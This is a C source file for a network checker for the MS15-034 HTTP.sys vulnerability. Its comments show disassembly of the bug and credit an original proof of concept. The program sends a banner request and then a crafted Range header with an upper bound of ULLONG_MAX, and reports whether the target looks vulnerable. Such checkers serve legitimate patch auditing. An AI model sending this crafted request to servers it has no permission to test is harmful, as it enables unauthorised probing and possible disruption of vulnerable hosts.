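/* PARTLYTESTED - MS15-034 Checker
 *
 * THE BUG:
 *   8a8b2112 56         push esi
 *   8a8b2113 6a00       push 0
 *   8a8b2115 2bc7       sub  eax,edi
 *   8a8b2117 6a01       push 1
 *   8a8b2119 1bca       sbb  ecx,edx
 *   8a8b211b 51         push ecx
 *   8a8b211c 50         push eax
 *   8a8b211d e8bf69fbff call HTTP!RtlULongLongAdd (8a868ae1) ; here
 *
 * ORIGINAL POC: http://pastebin.com/raw.php?i=ypURDPc4
 * BY: john.b.hale@gmai.com
 * Twitter: @rhcp011235
 */

/* Strict ISO mode (-std=c11) hides the POSIX socket/unistd declarations on
 * glibc unless a feature macro is requested; do it before any include. */
#define _POSIX_C_SOURCE 200809L

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

enum {
    HTTP_PORT = 80,        /* the checker only probes plain HTTP */
    RECV_BUF_SIZE = 1024   /* enough for a status line plus headers */
};

/* Open a blocking TCP connection to `ip` on port 80.
 *
 * `ip` must be a dotted-quad IPv4 literal: inet_pton() performs no name
 * resolution, so a hostname is rejected as invalid.
 *
 * Returns the connected descriptor; the caller owns it and must close() it.
 * Every failure is fatal: the reason is printed and the process exits, so a
 * caller never receives an invalid descriptor. */
int connect_to_server(char *ip)
{
    struct sockaddr_in serv_addr = {
        .sin_family = AF_INET,
        .sin_port = htons(HTTP_PORT),
    };

    int sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd == -1) {
        perror("socket");
        exit(1);
    }

    /* inet_pton() returns 0 for a malformed address without touching errno,
     * so perror() would print a misleading "Success" there; report it ourselves. */
    int rc = inet_pton(AF_INET, ip, &serv_addr.sin_addr);
    if (rc < 0) {
        perror("inet_pton");
        exit(1);
    }
    if (rc == 0) {
        fprintf(stderr, "inet_pton: '%s' is not a valid IPv4 address\n", ip);
        exit(1);
    }

    if (connect(sockfd, (struct sockaddr *)&serv_addr, sizeof serv_addr) < 0) {
        perror("connect()");
        exit(1);
    }
    return sockfd;
}

/* Write all `len` bytes of `buf` to `fd`, continuing after short writes and
 * after EINTR/EAGAIN.
 *
 * Returns the number of bytes written: `len` on success, or fewer only if
 * write() returned 0. Any other error is fatal (perror() + exit).
 *
 * NOTE(review): on a blocking socket EAGAIN is not expected; on a
 * non-blocking descriptor the retry would spin rather than wait. */
ssize_t safe_write(int fd, const char *buf, size_t len)
{
    size_t ofs = 0;

    while (ofs < len) {
        ssize_t r = write(fd, buf + ofs, len - ofs);
        if (r > 0) {
            ofs += (size_t)r;
        } else if (r == 0) {
            break;
        } else if (errno == EAGAIN || errno == EINTR) {
            continue;
        } else {
            perror("write()");
            exit(1);
        }
    }
    return (ssize_t)ofs;
}

/* Read up to `len` bytes from `fd` into `buf`, continuing after short reads
 * and after EINTR/EAGAIN, until the buffer is full or the peer closes.
 *
 * Returns the number of bytes stored (0..len). The data is NOT
 * NUL-terminated; callers that treat it as a string must terminate it
 * (see bodychop()). Any error other than EINTR/EAGAIN is fatal.
 *
 * NOTE(review): because this only returns on EOF or a full buffer, a server
 * that keeps the connection open after a short response makes the caller
 * block until the server's idle timeout — confirm against the target. */
ssize_t safe_read(int fd, char *buf, size_t len)
{
    size_t ofs = 0;

    while (ofs < len) {
        ssize_t r = read(fd, buf + ofs, len - ofs);
        if (r > 0) {
            ofs += (size_t)r;
        } else if (r == 0) {
            break;  /* EOF: the peer closed the connection */
        } else if (errno == EAGAIN || errno == EINTR) {
            continue;
        } else {
            perror("read()");
            exit(1);
        }
    }
    return (ssize_t)ofs;
}

/* NUL-terminate the first `r` bytes of `buf` and cut the string at the end
 * of the HTTP header block — the first "\n\n" or "\n\r\n" — so that later
 * strstr() calls only see the status line and headers, never the body.
 *
 * `buf` must have room for r + 1 bytes. A negative `r` is treated as 0.
 * The bounds checks below are explicit rather than relying on the
 * terminator short-circuiting the comparisons. */
void bodychop(char *buf, int r)
{
    if (r < 0) {
        r = 0;
    }
    buf[r] = '\0';

    for (int i = 0; i + 1 < r; i++) {
        if (buf[i] != '\n') {
            continue;
        }
        if (buf[i + 1] == '\n' ||
            (buf[i + 1] == '\r' && i + 2 < r && buf[i + 2] == '\n')) {
            buf[i] = '\0';
            break;
        }
    }
}

/* Usage: <prog> <ipv4-address>
 *
 * Connects twice to the target's port 80: first with a plain HTTP/1.0 GET to
 * see whether the response headers mention "Microsoft", then with the
 * MS15-034 probe request and classifies the status line it gets back.
 * Each socket is closed before the next connection so no descriptor leaks. */
int main(int argc, char *argv[])
{
    char recvbuf[RECV_BUF_SIZE];
    /* Banner check: an HTTP/1.0 request, which the server answers and closes. */
    char request[] = "GET / HTTP/1.0\r\n\r\n";
    /* MS15-034 probe: the Range header whose upper bound is ULLONG_MAX; a
     * "Requested Range Not Satisfiable" status line is the unpatched
     * HTTP.sys fingerprint this checker keys on. */
    char request1[] = "GET / HTTP/1.1\r\nHost: localhost\r\nRange: bytes=0-18446744073709551615\r\n\r\n";

    if (argc != 2) {
        fprintf(stderr, "Usage: %s <ipv4-address>\n", argv[0]);
        return 1;
    }

    int sockfd = connect_to_server(argv[1]);
    safe_write(sockfd, request, strlen(request));
    /* Leave one byte for the terminator bodychop() writes at recvbuf[r]. */
    ssize_t r = safe_read(sockfd, recvbuf, sizeof recvbuf - 1);
    close(sockfd);
    bodychop(recvbuf, (int)r);
    if (!strstr(recvbuf, "Microsoft")) {
        printf("[*] NOT IIS\n");
    }

    sockfd = connect_to_server(argv[1]);
    safe_write(sockfd, request1, strlen(request1));
    r = safe_read(sockfd, recvbuf, sizeof recvbuf - 1);
    close(sockfd);
    bodychop(recvbuf, (int)r);
    if (strstr(recvbuf, "Requested Range Not Satisfiable")) {
        printf("[!] Looks VULN\n");
    } else if (strstr(recvbuf, "The request has an invalid header name\n")) {
        /* NOTE(review): bodychop() already dropped the body, so this text
         * can only match if it appears in the status line or headers —
         * confirm against a patched host; otherwise the branch below fires. */
        printf("[*] Looks Patched\n");
    } else {
        printf("[*] Unexpected response; cannot discern patch status\n");
    }
    printf("%s\n", recvbuf);
    return 0;
}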